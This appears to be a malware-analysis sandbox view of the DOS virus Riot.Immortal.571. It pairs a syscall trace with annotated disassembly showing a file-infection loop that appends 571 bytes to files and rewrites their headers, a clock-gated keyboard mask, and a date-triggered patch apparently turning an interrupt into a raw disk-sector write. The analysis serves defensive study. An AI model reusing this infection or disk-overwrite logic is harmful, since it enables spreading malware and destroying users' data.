Sample viewer

vx.netlux.org/Virus.DOS.Riot.Immortal.571


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:05:23.845297399Z 26 PC: 12a65 | Set disk transfer address
2018-12-17T22:05:23.8470234Z 53 PC: 12a6b | Get interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T22:05:23.8482082Z 53 PC: 12a78 | Get interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
; Disassembly window captured at the return from the "Get time" call (PC 0x12a83).
; 16-bit real-mode code, Intel operand order. DOS Get time (INT 21h/AH=2Ch) returns
; hundredths of a second in DL, so the first compare makes the port write below
; depend on the clock rather than on any input.
; NOTE(review): all data is addressed relative to BP, which presumably holds the
; body's load offset inside the host file - confirm against the entry code.
2018-12-17T22:05:23.849312268Z 44 PC: 12a83 | Get time 0x12a83: cmp dl, 0xd
0x12a86: jg 0x12a8c                      ; DL > 13 (signed): skip the port write
0x12a88: mov al, 0x82                    ; mask value with bits 1 and 7 set
0x12a8a: out 0x21, al                    ; port 0x21 = master 8259 PIC mask register: IRQ1 (keyboard) and IRQ7 masked
0x12a8c: lea dx, word ptr [bp + 0x2e5]   ; DX = first name buffer for the routine at 0x12ba0
0x12a90: call 0x12ba0                    ; trace rows at PC 12ba5..12bf0: open, read 4, seek, write 571, seek, write 4, close
0x12a93: lea dx, word ptr [bp + 0x2f5]   ; DX = second name buffer
0x12a97: call 0x12ba0                    ; trace shows only an Open for this call; presumably the open failed - confirm
; The 571-byte write equals the size in the sample name, and the 4-byte read and
; 4-byte rewrite fit a file infector saving and replacing a host's first bytes.
0x12a9a: mov ah, 0x3c                    ; INT 21h/AH=3Ch: create or truncate file
0x12a9c: mov cx, 0                       ; CX = 0: normal file attributes
0x12a9f: lea dx, word ptr [bp + 0x307]   ; DX = name of the file to create (logged at PC 12aa5)
0x12aa3: int 0x21
0x12aa5: lea dx, word ptr [bp + 0x315]   ; DX = 0x1f-byte buffer that is written out below
0x12aa9: mov si, 0x1f                    ; SI = 0x1f; presumably a byte count for 0x12bf1 - body not visible here
0x12aac: nop
0x12aad: call 0x12bf1                    ; NOTE(review): helper not shown; no syscall is logged between create and write
0x12ab0: mov bx, ax                      ; BX = AX; the create handle only if 0x12bf1 preserves AX - confirm
0x12ab2: mov ax, 0x4000                  ; AH = 40h: write file or device
0x12ab5: mov cx, 0x1f                    ; 31 bytes, matching "Write 31 bytes on handle 5" at PC 12abf
0x12ab8: nop
2018-12-17T22:05:23.851530457Z 61 PC: 12ba5 | Open file (Filename = '')
2018-12-17T22:05:23.862251079Z 63 PC: 12bb3 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:05:23.867530128Z 66 PC: 12bc2 | Move file pointer
2018-12-17T22:05:23.868829965Z 64 PC: 12bd4 | Write file or device (Write 571 bytes on handle 5)
2018-12-17T22:05:24.202402416Z 66 PC: 12bdc | Move file pointer
2018-12-17T22:05:24.203779336Z 64 PC: 12be7 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:05:24.206573157Z 62 PC: 12bf0 | Close file
2018-12-17T22:05:24.213737432Z 61 PC: 12ba5 | Open file (Filename = '')
2018-12-17T22:05:24.223054346Z 60 PC: 12aa5 | Create or truncate file
2018-12-17T22:05:24.233072258Z 64 PC: 12abf | Write file or device (Write 31 bytes on handle 5)
2018-12-17T22:05:24.241313917Z 62 PC: 12acf | Close file
; Disassembly window captured at the return from the second "Get time" call
; (PC 0x12ad3). DL holds hundredths of a second, so the message path below is
; taken on a clock-dependent basis. In this run the next logged call is at
; PC 12c09, not the AH=9 print, so the branch appears to have been skipped.
2018-12-17T22:05:24.261764347Z 44 PC: 12ad3 | Get time 0x12ad3: cmp dl, 0x32
0x12ad6: jg 0x12b12                      ; DL > 50 (signed): skip the message
0x12ad8: mov si, 0x12                    ; SI = 0x12 for the helper at 0x12bf1
0x12adb: lea dx, word ptr [bp + 0x1b3]   ; DX = buffer at BP+0x1b3
0x12adf: call 0x12bf1                    ; NOTE(review): called before and after the print, which would fit an in-place decode/re-encode of the buffer - helper body not visible
0x12ae2: mov ah, 9                       ; INT 21h/AH=09h: print '$'-terminated string at DS:DX
0x12ae4: int 0x21
0x12ae6: mov si, 0x12
0x12ae9: call 0x12bf1                    ; same helper and length again
0x12aec: mov ah, 0                       ; INT 16h/AH=00h: BIOS wait for a keystroke
0x12aee: int 0x16
0x12af0: jmp 0x12b12                     ; unconditional: nothing below is reached by fall-through
; Everything from 0x12af2 on follows an unconditional jmp, and its encodings are
; printable ASCII (0x49 0x20 0x61 0x6d 0x20 0x61 0x20 = "I am a "). This is very
; likely embedded text swept up by linear disassembly, not code; read it as a
; string when extracting indicators instead of trusting the mnemonics.
0x12af2: nop
0x12af3: dec cx
0x12af4: and byte ptr [bx + di + 0x6d], ah
0x12af7: and byte ptr [bx + di + 0x20], ah
0x12afa: inc dx
0x12afb: bound si, dword ptr fs:[di + 0x67]
0x12b00: and byte ptr [bx + di + 0x6e], ah
0x12b03: and byte ptr fs:[bx + di + 0x4c], al
2018-12-17T22:05:24.264121178Z 67 PC: 12c09 | Get or set file attributes
2018-12-17T22:05:24.270435545Z 65 PC: 12c0d | Delete file (Filename = '')
2018-12-17T22:05:24.276095002Z 78 PC: 12b2e | Find first file
2018-12-17T22:05:24.281788335Z 61 PC: 12ba5 | Open file (Filename = '')
2018-12-17T22:05:24.28854579Z 63 PC: 12bb3 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:05:24.307128731Z 66 PC: 12bc2 | Move file pointer
2018-12-17T22:05:24.308459187Z 64 PC: 12bd4 | Write file or device (Write 571 bytes on handle 5)
2018-12-17T22:05:24.321984782Z 66 PC: 12bdc | Move file pointer
2018-12-17T22:05:24.324138545Z 64 PC: 12be7 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:05:24.330547782Z 62 PC: 12bf0 | Close file
2018-12-17T22:05:24.343519328Z 79 PC: 12b2e | Find next file
2018-12-17T22:05:24.356115861Z 61 PC: 12ba5 | Open file (Filename = '')
2018-12-17T22:05:24.363010257Z 63 PC: 12bb3 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:05:24.37001741Z 66 PC: 12bc2 | Move file pointer
2018-12-17T22:05:24.372804281Z 64 PC: 12bd4 | Write file or device (Write 571 bytes on handle 5)
2018-12-17T22:05:24.381053675Z 66 PC: 12bdc | Move file pointer
2018-12-17T22:05:24.386561928Z 64 PC: 12be7 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:05:24.394342073Z 62 PC: 12bf0 | Close file
2018-12-17T22:05:24.403060676Z 79 PC: 12b2e | Find next file
2018-12-17T22:05:24.406140762Z 61 PC: 12ba5 | Open file (Filename = '')
2018-12-17T22:05:24.414427077Z 63 PC: 12bb3 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:05:24.421045676Z 66 PC: 12bc2 | Move file pointer
2018-12-17T22:05:24.42279905Z 64 PC: 12bd4 | Write file or device (Write 571 bytes on handle 5)
2018-12-17T22:05:24.432105482Z 66 PC: 12bdc | Move file pointer
2018-12-17T22:05:24.433830918Z 64 PC: 12be7 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:05:24.440526859Z 62 PC: 12bf0 | Close file
2018-12-17T22:05:24.450551911Z 79 PC: 12b2e | Find next file
2018-12-17T22:05:24.45395484Z 61 PC: 12ba5 | Open file (Filename = '')
2018-12-17T22:05:24.460656689Z 63 PC: 12bb3 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:05:24.468452263Z 66 PC: 12bc2 | Move file pointer
2018-12-17T22:05:24.470494107Z 64 PC: 12bd4 | Write file or device (Write 571 bytes on handle 5)
2018-12-17T22:05:24.479041928Z 66 PC: 12bdc | Move file pointer
2018-12-17T22:05:24.480715289Z 64 PC: 12be7 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:05:24.487735734Z 62 PC: 12bf0 | Close file
2018-12-17T22:05:24.496317336Z 79 PC: 12b2e | Find next file
2018-12-17T22:05:24.498898089Z 61 PC: 12ba5 | Open file (Filename = '')
2018-12-17T22:05:24.505963059Z 63 PC: 12bb3 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:05:24.512473613Z 66 PC: 12bc2 | Move file pointer
2018-12-17T22:05:24.513810984Z 64 PC: 12bd4 | Write file or device (Write 571 bytes on handle 5)
2018-12-17T22:05:24.522427018Z 66 PC: 12bdc | Move file pointer
2018-12-17T22:05:24.524286584Z 64 PC: 12be7 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:05:24.530957852Z 62 PC: 12bf0 | Close file
; Disassembly window captured at the return from "Get date" (PC 0x12b59).
; DOS Get date (INT 21h/AH=2Ah) returns the month in DH and the day in DL; both
; compares below gate a date-triggered path that ends at the patched INT.
2018-12-17T22:05:24.540686657Z 42 PC: 12b59 | Get date 0x12b59: cmp dh, 0x11
0x12b5c: jl 0x12b85                      ; month < 0x11: skip. NOTE(review): a DOS month is 1-12, so this signed branch looks always taken - confirm
0x12b5e: cmp dl, 8
0x12b61: jl 0x12b85                      ; day < 8: skip
0x12b63: lea dx, word ptr [bp + 0x1b3]   ; same BP+0x1b3 buffer and 0x12 length used by the message path at 0x12adb
0x12b67: mov si, 0x12
0x12b6a: call 0x12bf1                    ; helper not visible in this window
0x12b6d: mov bx, dx                      ; BX = buffer offset
0x12b6f: mov ah, 0x19                    ; INT 21h/AH=19h: get current default drive, returned in AL
0x12b71: int 0x21
0x12b73: mov cx, 0x25                    ; CX = 0x25
0x12b76: mov dx, 0                       ; DX = 0
0x12b79: push ds
0x12b7a: pop es                          ; ES = DS
0x12b7b: mov byte ptr [bp + 0x241], 0x26 ; run-time byte patch just before the INT below
; NOTE(review): AL = drive, CX = count, DX = start and DS:BX = buffer match the
; INT 26h (absolute disk write) register convention, and the "add sp, 2" after
; the INT matches the flags word that INT 25h/26h leave on the stack. If
; BP+0x241 resolves to the operand byte at 0x12b81, the instruction executed is
; int 0x26, not the int 0x19 in this pre-patch snapshot. Static signatures or
; triage based only on the listed bytes would miss a raw-sector overwrite here;
; confirm with a post-patch memory dump.
0x12b80: int 0x19
0x12b82: add sp, 2                       ; drops one word from the stack after the INT returns
0x12b85: mov ah, 0x1a                    ; INT 21h/AH=1Ah: set disk transfer address
0x12b87: mov dx, 0x80                    ; DS:0080h, the default DTA inside the PSP
0x12b8a: int 0x21                        ; logged as "Set disk transfer address" at PC 12b8c
2018-12-17T22:05:24.542882339Z 26 PC: 12b8c | Set disk transfer address